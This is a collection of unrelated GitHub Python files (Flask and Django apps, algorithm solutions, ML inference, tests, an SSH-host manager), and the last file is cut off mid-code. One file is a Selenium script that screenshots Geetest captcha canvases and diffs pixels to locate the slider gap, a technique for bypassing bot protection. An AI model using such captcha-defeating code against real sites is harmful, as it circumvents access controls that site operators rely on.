import Api\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom controllers.customers_cars import Customer, Car, CustomerList, CarList\nfrom services.customers_cars import CustomerService, CarService\n\n\ndef main():\n # Create the Flask app\n app = Flask(__name__)\n 
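# any SQLAlchemy-compatible connection URL works here; a local SQLite file keeps the example self-contained\n    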
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///rental.sqlite'\n\n # Create the Flask-RESTful API\n api = Api(app)\n\n # Connect to the database with Flask-SQLAlchemy\n db = SQLAlchemy(app)\n\n customers = CustomerService(db)\n\n # Register the route for each resource\n api.add_resource(CustomerList, '/customers/',\n resource_class_args=[customers])\n\n api.add_resource(Customer, '/customers/',\n resource_class_args=[customers])\n cars = CarService(db)\n\n # Register the route for each resource\n api.add_resource(CarList, '/cars/',\n resource_class_args=[cars])\n\n api.add_resource(Car, '/cars/',\n resource_class_args=[cars])\n app.run(debug=True)\n\n\nif __name__ == '__main__':\n main()","repo_name":"alexandurrr/simple_car_management_test","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9091378177","text":"class Solution:\n def rob(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums) == 0:\n return 0\n\n if len(nums) < 3:\n return max(nums)\n\n dp = nums\n # dp[i] = max(dp[i - 1], dp[i - 2] + nums[i])\n\n for i, n in enumerate(nums):\n if i == 0:\n continue\n if i == 1:\n dp[i] = max(dp[0], dp[1])\n continue\n dp[i] = max(dp[i-1], dp[i - 2] + n)\n\n print(dp)\n return dp[-1]\n","repo_name":"casprwang/leetcode","sub_path":"solutions/198.house-robber/house-robber.py","file_name":"house-robber.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"20261896350","text":"from cleo.commands.command import Command\n\n\nclass SignatureCommand(Command):\n\n name = \"no:configure\"\n signature = (\n \"signature:command {foo : Foo} {bar? 
: Bar} {--z|baz : Baz} {--Z|bazz : Bazz}\"\n )\n\n description = \"description\"\n\n help = \"help\"\n\n def handle(self):\n self.line(\"handle called\")\n","repo_name":"vikpe/cleo","sub_path":"tests/fixtures/signature_command.py","file_name":"signature_command.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"14093893238","text":"#!/usr/bin/env python\n\"\"\"\nCoder: max.zhang\nDate: 2015-01-13\nDesc: main structures of network\n\"\"\"\nfrom pprint import pprint\nimport numpy\n\n\nclass Network(object):\n\n def __init__(self, ori_nodenum=10, mul=2):\n self._mat = numpy.zeros((ori_nodenum, ori_nodenum))\n self._node_dict = {}\n self._ori_nodenum = ori_nodenum\n self._mul = mul\n\n @property\n def _cur_size(self):\n return len(self._mat)\n\n @property\n def _node_num(self):\n return len(self._node_dict)\n\n def _expand(self):\n ori_size = self._cur_size\n new_size = ori_size * self._mul\n tmp_mat = numpy.zeros((new_size, new_size))\n for idx in xrange(ori_size):\n tmp_mat[idx][:ori_size] = self._mat[idx][:ori_size]\n self._mat = tmp_mat\n\n def _getNodeIdx(self, node_str):\n node_idx = self._node_dict.setdefault(node_str, self._node_num)\n if self._cur_size < self._node_num:\n self._expand()\n return node_idx\n\n def addEdge(self, node1_str, node2_str, weight=1):\n weight = float(weight)\n node1_idx = self._getNodeIdx(node1_str)\n node2_idx = self._getNodeIdx(node2_str)\n self._mat[node1_idx][node2_idx] = weight\n self._mat[node2_idx][node1_idx] = weight\n\n def show(self):\n print('[NodeIdx]\\t[NodeStr]')\n print('\\n'.join(['%s\\t%s' % item for item in\n [(value, key) for key, value in\n self._node_dict.items()]]))\n print('[NodeIdx]\\t[NodeIdx/Weight]...')\n for idx1 in range(self._node_num):\n nw_list = []\n w_list = self._mat[idx1]\n for idx2 in range(self._node_num):\n weight = self._mat[idx1][idx2]\n if weight < 1e-6:\n continue\n nw_list.append('%s/%s' % (idx2, weight))\n print('%s\\t%s' % (idx1, ','.join(nw_list)))\n\n def clear(self):\n self._mat = numpy.zeros((self._ori_nodenum, self._ori_nodenum))\n self._node_dict = {}\n\nif __name__ == \"__main__\":\n net = Network()\n with open('data/net.edge') as ins:\n for line in ins:\n node1_str, node2_str, weight = line.strip().split()\n net.addEdge(node1_str, node2_str, weight)\n net.show()\n","repo_name":"zyymax/online_community_detection","sub_path":"src/alg/zyy_network.py","file_name":"zyy_network.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40008255609","text":"import argparse\nimport os\nimport subprocess\nimport sys\nimport yaml\n\nimport pathlib\n\ndef yes_no_question(question=None, default=\"y\"):\n\n possible_answers = \"[Y/n]\" if default == \"y\" else \"[y/N]\"\n if question:\n answer = input(\"{} {} \".format(question, possible_answers))\n else:\n answer = input(\"{} \".format(possible_answers))\n\n if not answer:\n answer = default\n\n if answer.lower() in [\"y\", \"yes\", \"o\", \"oui\"]:\n return True\n return False\n\ndef pprint_header():\n print(\n \"Name Group ssh \"\n \" Port\"\n )\n print(\n \"-------------------------------------------------------------------------------\"\n )\n\n\ndef pprint_server(name, group, user, address, port):\n full = user + \"@\" + address\n space_1 = \" \" * (15 - len(name))\n space_2 = \" \" * (25 - len(group))\n space_3 = \" \" * (35 - len(full))\n space_4 = \" \" * (20 - 
len(address))\n\n print(name + space_1 + group + space_2 + user + \"@\" + address + space_3 + str(port))\n # print(\"{} ({}): {}@{}:{}\".format(name, group, user, address, port))\n\n\nhome = os.path.expanduser(\"~\")\n\nparser = argparse.ArgumentParser(description='Easy manage your ssh servers')\nparser.add_argument(\n '-f',\n '--file',\n help='Path to the yaml servers file',\n default='{}/.config/sshh/servers.yaml'.format(home),\n)\n\nsubparsers = parser.add_subparsers(dest='subcommand')\n\n# List\nparser_list = subparsers.add_parser('list')\nparser_list.add_argument('group', help='List server of group', nargs=\"?\")\n\n# Groups\nparser_list = subparsers.add_parser('groups')\n\n# Connect\nparser_connect = subparsers.add_parser('ssh')\nparser_connect.add_argument('--user', help='Connect with another user')\nparser_connect.add_argument('server', help='The server to connect')\n\n# Add\nparser_add = subparsers.add_parser('add')\nparser_add.add_argument('server', help='The server to add (user@host:port)')\nparser_add.add_argument('name', help='The server\\'s name to add')\nparser_add.add_argument('-g', '--group', help='Server group', required=True)\n\n# Add\nparser_add = subparsers.add_parser('remove')\nparser_add.add_argument('server', help='The server name to remove')\nparser_add.add_argument('-f', '--force', help='Force remove', action=argparse.BooleanOptionalAction)\n\n# parser.add_argument('--feature', action=argparse.BooleanOptionalAction)\n\n# Edit\nparser_edit = subparsers.add_parser('edit')\n\nargs = parser.parse_args()\n\n# init config file\nif not os.path.isfile(args.file):\n path = pathlib.Path(os.path.dirname(args.file))\n os.makedirs(os.path.dirname(args.file), exist_ok=True)\n with open(args.file, \"w+\") as f:\n f.write(\"servers:\\n\")\n\na_yaml_file = open(args.file)\nparsed_yaml_file = yaml.load(a_yaml_file, Loader=yaml.FullLoader)\nservers = parsed_yaml_file[\"servers\"]\n\n# Display error message if config file is empty\nif not servers:\n if args.subcommand != \"add\":\n print(\"Add a server first\")\n parser_add.print_help()\n sys.exit(1)\n\n# Display help\nif not args.subcommand:\n parser.print_help()\n\n# Display groups\nif args.subcommand == 'groups':\n groups = set([server[\"group\"] for server in servers])\n for group in groups:\n print(group)\n\n# List servers\nif args.subcommand == 'list':\n # FIXME: sort once\n sorted_list_tmp = sorted(servers, key=lambda k: k['name'])\n sorted_list = sorted(sorted_list_tmp, key=lambda k: k['group'])\n pprint_header()\n for server in sorted_list:\n if args.group:\n if len(args.group.split(\"/\")) == 1:\n requested_group = args.group\n server_groups = server[\"group\"].split(\"/\")\n if requested_group in server_groups:\n pprint_server(\n server[\"name\"],\n server[\"group\"],\n server[\"user\"],\n server[\"address\"],\n server[\"port\"],\n )\n\n else:\n requested_groups = args.group.split(\"/\")\n server_groups = server[\"group\"].split(\"/\")\n lrg = len(requested_groups)\n if requested_groups == server_groups[0:lrg]:\n pprint_server(\n server[\"name\"],\n server[\"group\"],\n server[\"user\"],\n server[\"address\"],\n server[\"port\"],\n )\n else:\n pprint_server(\n server[\"name\"],\n server[\"group\"],\n server[\"user\"],\n server[\"address\"],\n server[\"port\"],\n )\n\n# Connect to server\nif args.subcommand == 'ssh':\n for server in servers:\n if server[\"name\"] == args.server:\n user = args.user if args.user else server[\"user\"]\n cmd = \"ssh -p {} {}@{}\".format(server[\"port\"], user, server[\"address\"])\n # 
print(cmd)\n retcode = subprocess.call(cmd, shell=True)\n\n# Add a server\nif args.subcommand == \"add\":\n # create object\n obj = {\n \"name\": args.name,\n \"user\": args.server.split(\"@\")[0],\n \"address\": args.server.split(\"@\")[1].split(\":\")[0],\n \"port\": args.server.split(\"@\")[1].split(\":\")[1]\n if len(args.server.split(\"@\")[1].split(\":\")) == 2\n else 22,\n \"group\": args.group,\n }\n # Write it to yaml file\n if parsed_yaml_file[\"servers\"] is None:\n parsed_yaml_file[\"servers\"] = []\n parsed_yaml_file[\"servers\"].append(obj)\n with open(args.file, \"w+\") as file:\n yaml.dump(parsed_yaml_file, file)\n\n# remove a server\nif args.subcommand == \"remove\":\n\n if not args.force:\n # print(\"Remove {}? [Y/n]\".format(args.server))\n if not yes_no_question(\"Remove {}?\".format(args.server)):\n exit(0)\n\n new_servers = []\n for server in servers:\n if server[\"name\"] != args.server:\n new_servers.append(server)\n else:\n print(\"{} removed !\".format(args.server))\n\n yaml_dict = {\"servers\": new_servers}\n\n with open(args.file, \"w+\") as file:\n yaml.dump(yaml_dict, file)\n\n\n# Edit servers\nif args.subcommand == \"edit\":\n editor = os.environ.get('EDITOR')\n cmd = \"{} {}\".format(editor, args.file)\n retcode = subprocess.call(cmd, shell=True)\n","repo_name":"xgaia/sshh","sub_path":"sshh.py","file_name":"sshh.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21448307444","text":"import time\r\nfrom io import BytesIO\r\nfrom PIL import Image\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver import ActionChains\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport random\r\n\r\ndef get_screenshot(driver):\r\n \"\"\"\r\n 获取网页截图\r\n :return: 截图对象\r\n \"\"\"\r\n screenshot = driver.get_screenshot_as_png()\r\n screenshot = Image.open(BytesIO(screenshot))\r\n return screenshot\r\ndef cut_image(driver,name):\r\n driver.save_screenshot('all.png')\r\n #image=driver.find_element_by_xpath('/html/body/div[2]/div[2]/div[6]/div/div[1]/div[1]/div/a/div[1]')\r\n a= driver.find_element_by_xpath('/html/body/div[2]/div[2]/div[6]/div/div[1]/div[1]/div/a/div[1]/div/canvas[1]')\r\n print(a.location)\r\n print(a.size)\r\n left=a.location['x']\r\n top=a.location['y']\r\n right=left+a.size['width']\r\n buttom=top+a.size['height']\r\n print('####################')\r\n print(a.size['width'],a.size['height'])\r\n print(left,top,right,buttom)\r\n print('###################')\r\n image_obj=Image.open('all.png')\r\n img=image_obj.crop((left,top,right,buttom))\r\n img.save(name)\r\n \r\ndef get_image1(driver):\r\n time.sleep(2)\r\n #js_code=var x =document.getElementsByClassName(\"geetest_canvas_slice geetest_absolute\").style.display=\"none\";)\r\n \r\n #driver.execute_script(js_code)\r\n ele=driver.find_elements_by_tag_name('canvas')\r\n \r\n '''setAttribute(ele[2],'style','display: none;')'''\r\n#set\r\n driver.execute_script(\"arguments[0].setAttribute (arguments[1],arguments[2])\",ele[2],'style','display: none;')\r\n image=cut_image(driver,'que.png')\r\n#remove\r\n driver.execute_script(\"arguments[0].removeAttribute(arguments[1])\",ele[3],'style')\r\n image=cut_image(driver,'quan.png')\r\n time.sleep(0.5)\r\n#remove\r\n driver.execute_script(\"arguments[0].removeAttribute(arguments[1])\",ele[2], 'style')\r\n time.sleep(0.5)\r\n#set\r\n 
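# hide ele[3] again (presumably the full-background canvas captured as quan.png), restoring the captcha to its initial state\r\n    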
driver.execute_script(\"arguments[0].setAttribute (arguments[1],arguments[2])\",ele[3], 'style', 'display: none;')\r\n\r\ndef get_gap(image1,image2):\r\n print('size',image1.size)\r\n left=0 \r\n for i in range(left,image1.size[0]):\r\n for j in range(image1.size[1]):\r\n if not is_pixel_equal(image1,image2,i,j):\r\n left=i\r\n print('left',left)\r\n return left\r\ndef is_pixel_equal(image1,image2,x,y):\r\n pixel1=image1.load()[x,y]#que'''\r\n pixel2=image2.load()[x,y]#quan'''\r\n threshold=60\r\n if abs(pixel1[0]-pixel2[0]) Table:\n table = Table(\n title=f\"Page={data.page_number} of {data.num_pages}\"\n )\n table.add_column(\"Type\")\n table.add_column(\"Title\")\n table.add_column(\"UUID\", no_wrap=True)\n table.add_column(\"Tags\")\n\n for node in data.items:\n table.add_row(\n node.ctype,\n node.title,\n str(node.id),\n ','.join(sorted(tag.name for tag in node.tags))\n )\n\n return table\n","repo_name":"papermerge/papermerge-cli","sub_path":"papermerge_cli/format/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"27989502386","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n # page\n path('', views.dashboard, name='dashboard'),\n path('projects', views.allProject, name='project-all'),\n \n # authentication url\n path('register/', views.register, name='register-page'),\n path('login/', views.login, name='login-page'),\n path('logout/', views._logout, name='logout'),\n \n \n]\n\n\n","repo_name":"Apisit250aps/TaskManagement","sub_path":"page/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20628217861","text":"import torch\nfrom tqdm import tqdm\nfrom module.unet import UNet\nfrom collections import defaultdict\nimport pickle\nimport numpy as np\n\nclass DeepImpute(object):\n def __init__(self):\n self.imputer = self._load_model()\n\n\n def _load_model(self):\n result_dict = torch.load('/home/zhaojifan/Impute/ckpt/20191202-191412/10_0.47_0.72_0.90.ckpt')\n\n net_weight_dict = result_dict['model']\n\n imputer = UNet(n_channels=1, n_classes=1)\n imputer.load_state_dict(net_weight_dict)\n\n return imputer\n\n def _sample_mask(self, shape, index, prob_line=0.05):\n prob = np.random.uniform(0,1,shape)\n mask = np.uint8(prob >= prob_line)\n mask[:, index] = 0\n return mask\n\n def impute(self, haplotype : np.ndarray or list) -> np.ndarray:\n \"\"\"\n :parameters\n haplotype : 需要进行impute的数据, list或者numpy.ndarray类型\n \"\"\"\n f1_score_array = []\n nf_targets = None\n nf_predicts = None\n f_targets = None\n f_predicts = None\n fixlen = haplotype.shape[1]\n sample_num = 1000\n pos_embedding = np.exp([x/fixlen for x in range(fixlen)])\n\n from sklearn.metrics import f1_score, confusion_matrix, classification_report\n maf = np.load('tmp/maf.npy')\n filter_indexes = np.where(np.logical_and(maf >= 0.05, maf <= 0.95))[0]\n if isinstance(haplotype, list):\n haplotype = np.array(haplotype)\n if haplotype.ndim == 1:\n haplotype = np.expand_dims(haplotype, 0)\n with torch.set_grad_enabled(False):\n self.imputer.eval()\n for i in tqdm(range(haplotype.shape[1])):\n if not maf[i]:\n f1_score_array.append(-1)\n continue\n neg_sample = haplotype[haplotype[:, i] == 0, :]\n pos_sample = haplotype[haplotype[:, i] == 1, :]\n if neg_sample.shape[0] == 0 or pos_sample.shape[0] == 0:\n f1_score_array.append(-1)\n continue\n if 
neg_sample.shape[0] < sample_num:\n neg_over_sample = np.random.choice(neg_sample.shape[0], sample_num-neg_sample.shape[0])\n neg_over_sample = neg_sample[neg_over_sample, :]\n neg_over_sample = np.vstack((neg_sample, neg_over_sample))\n else:\n neg_over_sample = np.random.choice(neg_sample.shape[0], sample_num, replace=False)\n neg_over_sample = neg_sample[neg_over_sample, :]\n if pos_sample.shape[0] < sample_num:\n pos_over_sample = np.random.choice(pos_sample.shape[0], sample_num-pos_sample.shape[0])\n pos_over_sample = pos_sample[pos_over_sample, :]\n pos_over_sample = np.vstack((pos_sample, pos_over_sample))\n else:\n pos_over_sample = np.random.choice(pos_sample.shape[0], sample_num, replace=False)\n pos_over_sample = pos_sample[pos_over_sample]\n #print(neg_over_sample.shape, pos_over_sample.shape)\n over_sample = np.vstack((neg_over_sample, pos_over_sample))\n target = over_sample[:, i].flatten()\n nf_targets = target if nf_targets is None else np.hstack((nf_targets, target))\n if i in filter_indexes:\n f_targets = target if f_targets is None else np.hstack((f_targets, target))\n mask = self._sample_mask(over_sample.shape, i)\n net_input = over_sample * mask + 0.5 * (1 - mask) + pos_embedding\n net_input = np.expand_dims(net_input, 1)\n net_input = torch.from_numpy(net_input).float()\n net_prob = self.imputer(net_input)\n predict = np.uint8(net_prob.numpy()>=0.5)[:, i].flatten()\n nf_predicts = predict if nf_predicts is None else np.hstack((nf_predicts, predict))\n if i in filter_indexes:\n f_predicts = predict if f_predicts is None else np.hstack((f_predicts, predict))\n if np.all(target) or not np.any(target) or np.all(predict) or not np.any(predict):\n f1 = np.sum(target == predict) / len(target)\n else:\n\n f1 = f1_score(target, predict)\n print('F1_score : {:.2f} MAF : {:.2f}'.format(f1, maf[i]))\n f1_score_array.append(f1)\n print('='*50 +' 过滤掉位点的结果 ' + '='*50)\n print(confusion_matrix(f_targets, f_predicts))\n print(classification_report(f_targets, f_predicts))\n filter_f1 = np.array(f1_score_array)[filter_indexes]\n filter_f1 = filter_f1[filter_f1 != -1]\n print('[>=0.99]({:.4f}) [>=0.96]({:.4f}) [>=0.9]({:.4f})'.format(np.sum(filter_f1>=0.99)/len(filter_f1),\n np.sum(filter_f1>=0.96)/len(filter_f1),\n np.sum(filter_f1>=0.9)/len(filter_f1)))\n print('')\n print('='*50 +' 全部位点的结果 ' + '='*50)\n print(confusion_matrix(nf_targets, nf_predicts))\n print(classification_report(nf_targets, nf_predicts))\n filter_f1 = np.array(f1_score_array)\n filter_f1 = filter_f1[filter_f1 != -1]\n print('[>=0.99]({:.4f}) [>=0.96]({:.4f}) [>=0.9]({:.4f})'.format(np.sum(filter_f1>=0.99)/len(filter_f1),\n np.sum(filter_f1>=0.96)/len(filter_f1),\n np.sum(filter_f1>=0.9)/len(filter_f1)))\nif __name__ == \"__main__\":\n data = np.load('tmp/compare.npy')\n data = data[int(data.shape[0] * 0.93) + 1:,:]\n #test_data = data[:int(data.shape[0] * 0.8) + 1, :][-5:,...]\n #test_data = np.random.uniform(0,1,(5, 500))\n imputer = DeepImpute()\n imputer.impute(data)\n\n","repo_name":"Asdil/impute_unet","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39787901675","text":"from django.contrib import admin\nfrom edc_model_admin import audit_fieldset_tuple\n\nfrom ..admin_site import td_infant_admin\nfrom ..forms import InfantCovidScreeningForm\nfrom ..models import InfantCovidScreening\nfrom .model_admin_mixins import 
InfantCrfModelAdminMixin\n\n\n@admin.register(InfantCovidScreening, site=td_infant_admin)\nclass InfantCovidScreeningAdmin(InfantCrfModelAdminMixin, admin.ModelAdmin):\n    form = InfantCovidScreeningForm\n\n    fieldsets = (\n        (None, {\n            'fields': [\n                'infant_visit',\n                'report_datetime',\n                'covid_tested',\n                'covid_test_date',\n                'is_test_date_estimated',\n                'covid_results',\n                'household_positive',\n                'household_test_date',\n                'is_household_test_estimated',\n                'covid_contact',\n                'covid_symptoms',\n                'comments']}\n         ), audit_fieldset_tuple)\n\n    radio_fields = {\n        'covid_tested': admin.VERTICAL,\n        'is_test_date_estimated': admin.VERTICAL,\n        'covid_results': admin.VERTICAL,\n        'household_positive': admin.VERTICAL,\n        'is_household_test_estimated': admin.VERTICAL,\n        'covid_contact': admin.VERTICAL}\n\n    filter_horizontal = ('covid_symptoms',)\n","repo_name":"tshilo-dikotla/td-infant","sub_path":"td_infant/admin/infant_covid_screening_admin.py","file_name":"infant_covid_screening_admin.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"28911497196","text":"\"\"\"Nearest neighbours method.\n\nTypical usage example:\n\n    x_val, languages_characters_indexes_val = load_images(val_folder)\n\n    accuracy = test_nn_accuracy(20, 50, x_val, languages_characters_indexes_val)\n\"\"\"\n\n\nimport numpy as np\nfrom model_training import make_oneshot_task\n\n\ndef nearest_neighbour_correct(pairs, targets):\n    \"\"\"Checking correctness of the NN method.\n\n    Args:\n        pairs (list): Two ndarrays of images, where the 1st half belongs\n                      to different categories and the 2nd half to the same.\n        targets (ndarray): List of zeros and ones, with a 1 in the place\n                           where the photo in the 1st list is in the same\n                           category as the photo in the 2nd list.\n\n    Returns:\n        1 if nearest neighbour gets the correct answer for the one-shot task\n        given by (pairs, targets), 0 otherwise.\n    \"\"\"\n\n    L2_distances = np.zeros_like(targets)\n\n    for i in range(len(targets)):\n        L2_distances[i] = np.sum(np.sqrt((pairs[0][i] - pairs[1][i])**2))\n\n    if np.argmin(L2_distances) == np.argmax(targets):\n        return 1\n    return 0\n\n\ndef test_nn_accuracy(N, k, x, categories, language=None):\n    \"\"\"Returns accuracy of NN approach.\n\n    Args:\n        N (int): Number of images in support set.\n        k (int): Number of experiments.\n        x (ndarray): Array of arrays where each array (character) contains\n                     vector images (character representation).\n        categories (dict): Key is language, value is list\n                           of 2 elements: index of 1st character\n                           and index of last.\n    \"\"\"\n\n    print(\"Evaluating nearest neighbour on {} unique {}-way one-shot learning tasks ...\".format(k, N))\n\n    n_right = 0\n\n    for i in range(k):\n        pairs, targets = make_oneshot_task(N, x, categories, language)\n        correct = nearest_neighbour_correct(pairs, targets)\n        n_right += correct\n\n    return n_right / k\n","repo_name":"SmirnovAlexander/OneShotLearningSiameseNetworks","sub_path":"scripts/nearest_neighbours.py","file_name":"nearest_neighbours.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"36490591074","text":"numbers = open('./input.txt', 'r').read().split('\\n')\nnumbers = [int(i) for i in numbers]\n\nfound = False\nfor n1 in numbers:\n    for n2 in numbers:\n        n3 = 2020 - n1 - n2\n        if n3 in numbers:\n            found = True\n            print('n1: {}, n2: {}, n3: {}, n1*n2*n3: {}'.format(n1, n2, n3, n1*n2*n3))\n            break\n    if found:\n        
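# the flag lets the outer loop stop as soon as one matching triple has been printed\n        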
break\n","repo_name":"finafisken/adventofcode2020","sub_path":"day01/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29693760001","text":"from datetime import datetime\n\nimport pytest\nfrom flask import Flask\nfrom flask.testing import FlaskClient\n\nfrom fyyur.models import Artist, Show, Venue, db\nfrom fyyur.routes.show import get_shows\nfrom fyyur.schema.show import ShowResponse\nfrom tests.mock import mock_artist, mock_show, mock_venue\nfrom tests.utils import date_future\n\n\ndef test_get_shows_status_200(client: FlaskClient) -> None:\n response = client.get(\"/shows/\")\n assert response.status_code == 200\n assert b\"Venue1\" in response.data\n assert b\"Artist1\" in response.data\n\n\ndef add_show(\n app: Flask, client: FlaskClient, venue_id: int, artist_id: int, day_offset: int\n) -> bool:\n show = mock_show(venue_id=venue_id, artist_id=artist_id, day_offset=day_offset)\n\n prior_existed: bool = False\n existed: bool = False\n with app.app_context():\n prior_existed = (\n Show.query.filter_by(\n venue_id=show.venue_id,\n artist_id=show.artist_id,\n start_time=show.start_time,\n ).first()\n is not None\n )\n\n client.post(\"/shows/create\", data=show.model_dump())\n\n existed = (\n Show.query.filter_by(\n venue_id=show.venue_id,\n artist_id=show.artist_id,\n start_time=show.start_time,\n ).first()\n is not None\n )\n\n inserted = not prior_existed and existed\n return inserted\n\n\ndef test_create_show_successful(app: Flask, client: FlaskClient) -> None:\n with app.app_context():\n venue = mock_venue(100).to_orm(Venue)\n artist = mock_artist(200).to_orm(Artist)\n db.session.add(venue)\n db.session.add(artist)\n db.session.commit()\n\n # inserted into database\n assert add_show(app=app, client=client, venue_id=100, artist_id=200, day_offset=100)\n\n\ndef test_get_shows(app: Flask, client: FlaskClient) -> None:\n assert add_show(app=app, client=client, venue_id=1, artist_id=1, day_offset=100)\n assert add_show(app=app, client=client, venue_id=1, artist_id=2, day_offset=200)\n\n expected_shows: list[dict[str, int | str | datetime]] = [\n {\n \"venue_id\": 1,\n \"venue_name\": \"Venue1\",\n \"artist_id\": 1,\n \"artist_name\": \"Artist1\",\n \"artist_image_link\": \"https://images.artist1.com/\",\n \"start_time\": date_future(100),\n },\n {\n \"venue_id\": 1,\n \"venue_name\": \"Venue1\",\n \"artist_id\": 2,\n \"artist_name\": \"Artist2\",\n \"artist_image_link\": \"https://images.artist2.com/\",\n \"start_time\": date_future(200),\n },\n ]\n\n with app.app_context():\n all_shows = get_shows()\n dumped_shows = [show.model_dump() for show in get_shows()]\n for expected_show in expected_shows:\n assert ShowResponse.model_validate(expected_show) in all_shows\n assert expected_show in dumped_shows\n\n\n@pytest.mark.parametrize(\"venue_id, artist_id\", [(1, 100), (100, 1), (100, 100)])\ndef test_create_show_venue_or_artist_doesnt_exist(\n app: Flask, client: FlaskClient, venue_id: int, artist_id: int\n) -> None:\n assert not add_show(\n app=app, client=client, venue_id=venue_id, artist_id=artist_id, day_offset=100\n )\n\n\ndef test_create_show_duplicated(app: Flask, client: FlaskClient) -> None:\n assert add_show(app=app, client=client, venue_id=1, artist_id=1, day_offset=100)\n assert not add_show(app=app, client=client, venue_id=1, artist_id=1, day_offset=100)\n\n\ndef test_create_show_same_date_same_venue(app: Flask, client: FlaskClient) -> None:\n 
assert add_show(app=app, client=client, venue_id=1, artist_id=1, day_offset=100)\n assert not add_show(app=app, client=client, venue_id=1, artist_id=2, day_offset=100)\n\n\ndef test_create_show_same_date_same_artist(app: Flask, client: FlaskClient) -> None:\n assert add_show(app=app, client=client, venue_id=1, artist_id=1, day_offset=100)\n assert not add_show(app=app, client=client, venue_id=2, artist_id=1, day_offset=100)\n\n\ndef test_create_show_same_date_different_venue_and_artist(\n app: Flask, client: FlaskClient\n) -> None:\n assert add_show(app=app, client=client, venue_id=1, artist_id=1, day_offset=100)\n assert add_show(app=app, client=client, venue_id=2, artist_id=2, day_offset=100)\n\n\ndef test_create_show_in_the_past(app: Flask, client: FlaskClient) -> None:\n assert not add_show(app=app, client=client, venue_id=2, artist_id=2, day_offset=-100)\n","repo_name":"dqkqd/fyyur","sub_path":"tests/test_show.py","file_name":"test_show.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9715442044","text":"# -*- coding: utf-8 -*-\n\nimport pytest\nfrom tests.core.renderer.xml import params\nfrom shapely.geometry import LineString\n\n\n@pytest.mark.parametrize('parameters', params) # noqa\ndef test_line(template, parameters):\n line = LineString(((0, 0), (1, 1)))\n\n def get_gml_id():\n return 'gml1'\n\n content = template.render(**{\n 'params': parameters,\n 'default_language': 'de',\n 'line': line,\n 'get_gml_id': get_gml_id\n }).decode('utf-8').split('\\n')\n expected_content = \"\"\"\n\n \n\n 0.00.0\n \n \n\n 1.01.0\n \n \"\"\".split('\\n')\n expected_lines = []\n for line in expected_content:\n expected_lines.append(line.strip())\n content_lines = []\n for line in content:\n content_lines.append(line.strip())\n assert expected_lines == content_lines\n","repo_name":"openoereb/pyramid_oereb","sub_path":"tests/core/renderer/xml/test_geometry_line.py","file_name":"test_geometry_line.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"22939422865","text":"import math\nfrom queue import PriorityQueue\nimport main\n\nclass ManhattanDistance:\n def distance(self,state):\n h = 0\n for i in range(0,len(state), 3):\n for j in range(0,3):\n xval = j\n yval = i/3\n\n if state[i+j] == '1':\n h = h + abs(xval-1) + yval\n elif state[i+j] == '2':\n h = h + abs(xval-2) + yval\n elif state[i+j] == '3':\n h = h + abs(xval) + abs(yval-1)\n elif state[i+j] == '4':\n h = h + abs(xval-1) + abs(yval-1)\n elif state[i+j] == '5':\n h = h + abs(xval-2) + abs(yval - 1)\n elif state[i+j] == '6':\n h = h + abs(xval) + abs(yval - 2)\n elif state[i+j] == '7':\n h = h + abs(xval-1) + abs(yval - 2)\n elif state[i+j] == '8':\n h = h + abs(xval-2) + abs(yval - 2)\n return h\n\n\nclass EuclideanDistance:\n def distance(self, state):\n h = 0\n for i in range(0,len(state), 3):\n for j in range(0,3):\n xval = j\n yval = i / 3\n\n if state[i + j] == '1':\n h = h + math.sqrt((xval - 1)**2 + yval**2)\n elif state[i + j] == '2':\n h = h + math.sqrt((xval - 2)**2 + yval**2)\n elif state[i + j] == '3':\n h = h + math.sqrt((xval)**2 + (yval - 1)**2)\n elif state[i + j] == '4':\n h = h + math.sqrt((xval - 1)**2 + (yval - 1)**2)\n elif state[i + j] == '5':\n h = h + math.sqrt((xval - 2)**2 + (yval - 1)**2)\n elif state[i + j] == '6':\n h = h + math.sqrt((xval)**2 + (yval - 2)**2)\n elif state[i + j] == '7':\n h = h + 
